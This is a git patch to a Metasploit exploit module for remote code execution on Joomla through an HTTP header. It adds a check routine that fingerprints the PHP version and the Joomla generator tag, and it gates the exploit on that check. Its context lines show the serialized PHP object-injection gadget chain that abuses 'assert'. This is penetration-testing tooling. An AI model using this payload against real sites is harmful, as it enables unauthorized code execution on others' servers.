From b9b280954bc45f659c1fad10efed982fee3ca098 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 15 Dec 2015 11:03:36 -0600
Subject: [PATCH] Add a check for joomla

---
 .../multi/http/joomla_http_header_rce.rb      | 46 +++++++++++++++++++
 1 file changed, 46 insertions(+)

diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb
index 6d621faf21..9881b5945e 100644
--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -49,6 +49,39 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
 
+  def check
+    res = send_request_cgi({'uri' => target_uri.path })
+
+    unless res
+      vprint_error("Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless res.headers['X-Powered-By']
+      vprint_error("Unable to determine the PHP version.")
+      return Exploit::CheckCode::Unknown
+    end
+
+    php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
+    vprint_status("Found PHP version: #{php_version}")
+
+    if php_version > '5.3'
+      vprint_error('This module currently does not work against this PHP version')
+      return Exploit::CheckCode::Safe
+    end
+
+    res.get_html_meta_elements.each do |element|
+      if element.attributes['name'] &&
+        /^generator$/i === element.attributes['name'] &&
+        element.attributes['content'] &&
+        /joomla/i === element.attributes['content'].value
+        return Exploit::CheckCode::Detected
+      end
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
   def get_payload
     pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
     middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
@@ -58,7 +91,20 @@ class Metasploit3 < Msf::Exploit::Remote
     return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
   end
 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+
   def exploit
+    if check == Exploit::CheckCode::Safe
+      print_error('Target seems safe, so we will not continue.')
+      return
+    end
+
     print_status("Sending payload ...")
     res = send_request_cgi({
       'method'    => 'GET',